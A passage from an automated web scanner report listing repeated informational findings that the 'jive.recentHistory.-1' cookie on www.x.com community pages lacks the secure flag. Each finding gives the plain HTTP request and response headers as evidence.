Set-Cookie: jive.recentHistory.-1=31342c323031303b31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=110512 t=1313157031704201
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.8. https://www.x.com/community/ppx/apps101

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/apps101

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/apps101 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:01 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033373b31342c323033303b31342c323032383b31342c323032373b31342c323032393b31342c323036333b31342c323032363b31342c323032303b31342c323031383b31342c323031373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:02 GMT; Path=/
Vary: User-Agent
JP: D=126957 t=1313157062588323
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.9. https://www.x.com/community/ppx/authentication

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/authentication

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/authentication HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323031393b31342c323237303b31342c323237363b31342c323030353b31342c323030373b31342c323030343b31342c323131343b31342c323030333b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:31 GMT; Path=/
Vary: User-Agent
JP: D=114393 t=1313157031269098
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.10. https://www.x.com/community/ppx/businesspayments

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/businesspayments

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/businesspayments HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134333b31342c323134353b31342c323034373b31342c323030353b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b31342c323030343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=142422 t=1313157077938365
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.11. https://www.x.com/community/ppx/button_manager

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/button_manager

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/button_manager HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/dev-tools
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:40:02 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030373b31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:40:03 GMT; Path=/
Vary: User-Agent
JP: D=263918 t=1313156403269344
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.12. https://www.x.com/community/ppx/code_samples

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/code_samples

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/code_samples HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032353b31342c323032333b31342c323033343b31342c323036333b31342c323032343b31342c323036343b31342c323032323b31342c323033323b31342c323033373b31342c323033303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:06 GMT; Path=/
Vary: User-Agent
JP: D=282830 t=1313157065903868
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.13. https://www.x.com/community/ppx/dev-tools

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/xspaces?view=documents
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:59 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030333b31342c323030353b31342c323030343b31342c323131343b31342c323237363b31342c323030383b3130322c333831313b332c323032353b332c32333938353b332c31303939373b332c323839313b332c33353136303b332c323430323b332c35333639373b332c39313330313b332c31323739393b332c3133313833303b; Expires=Sun, 11-Sep-2011 13:39:59 GMT; Path=/
Vary: User-Agent
JP: D=80199 t=1313156399568143
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.14. https://www.x.com/community/ppx/dev-tools/decision_tree

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/dev-tools/decision_tree

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/dev-tools/decision_tree HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=61135 t=1313157083274538
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.15. https://www.x.com/community/ppx/devchallenge

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:21 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323038363b31342c323134393b31342c323131313b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=53170 t=1313157081752731
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.16. https://www.x.com/community/ppx/devchallenge/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devchallenge/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devchallenge/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:22 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b31342c323134363b31342c323134323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=56010 t=1313157082994090
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.17. https://www.x.com/community/ppx/developer

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/developer

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/developer HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323135343b31342c323131353b31342c323131313b31342c323232363b31342c323134393b31342c323038363b31342c323038323b31342c323030353b31342c323134343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:23 GMT; Path=/
Vary: User-Agent
JP: D=127401 t=1313157083736368
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.18. https://www.x.com/community/ppx/devtalk

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devtalk

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devtalk HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:20 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131313b31342c323134393b31342c323038323b31342c323131353b31342c323038363b31342c323030353b31342c323134343b31342c323134363b31342c323134323b31342c323134333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:21 GMT; Path=/
Vary: User-Agent
JP: D=227171 t=1313157081321481
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.19. https://www.x.com/community/ppx/devzone

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/devzone

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/devzone HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323133333b31342c323032343b31342c323131343b31342c323033343b31342c323032353b31342c323036333b31342c323032333b31342c323036343b31342c323032323b31342c323033323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:07 GMT; Path=/
Vary: User-Agent
JP: D=144424 t=1313157066963707
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.20. https://www.x.com/community/ppx/documentation

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/documentation

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/documentation HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:04 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323032343b31342c323032323b31342c323036343b31342c323036333b31342c323033323b31342c323033373b31342c323033303b31342c323032393b31342c323032383b31342c323032373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:04 GMT; Path=/
Vary: User-Agent
JP: D=195109 t=1313157064805423
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.21. https://www.x.com/community/ppx/ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/ec

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/ec HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7238D44EFB679CF81CE553C3866BE5EA.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 01:59:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030383b; Expires=Sun, 11-Sep-2011 01:59:40 GMT; Path=/
Vary: User-Agent
JP: D=109211 t=1313114380657704
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.22. https://www.x.com/community/ppx/feedback

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/feedback

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/feedback HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:19 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038363b31342c323038323b31342c323134323b31342c323030353b31342c323134343b31342c323134363b31342c323134333b31342c323134353b31342c323034373b31342c323034363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:20 GMT; Path=/
Vary: User-Agent
JP: D=75997 t=1313157080027534
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.23. https://www.x.com/community/ppx/fundraising

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/fundraising

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/fundraising HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:17 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323134353b31342c323134323b31342c323030353b31342c323134333b31342c323034373b31342c323034363b31342c323034353b31342c323034343b31342c323034333b31342c323133303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:18 GMT; Path=/
Vary: User-Agent
JP: D=83960 t=1313157078276262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.24. https://www.x.com/community/ppx/global

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/ppx/showcase
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323131343b31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:39:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323030343b31342c323131343b31342c323237363b31342c323030383b332c35333437343b332c35333735313b332c35333436333b332c38393433393b332c323030383b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:39:04 GMT; Path=/
Vary: User-Agent
JP: D=186175 t=1313156344173833
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.25. https://www.x.com/community/ppx/global/au

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/au

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/au HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323033393b31342c323030343b31342c323131343b31342c323133333b31342c323032353b31342c323033343b31342c323032333b31342c323032343b31342c323036333b31342c323036343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:10 GMT; Path=/
Vary: User-Agent
JP: D=67754 t=1313157070067212
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.26. https://www.x.com/community/ppx/global/ca

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/global/ca

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/global/ca HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:10 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
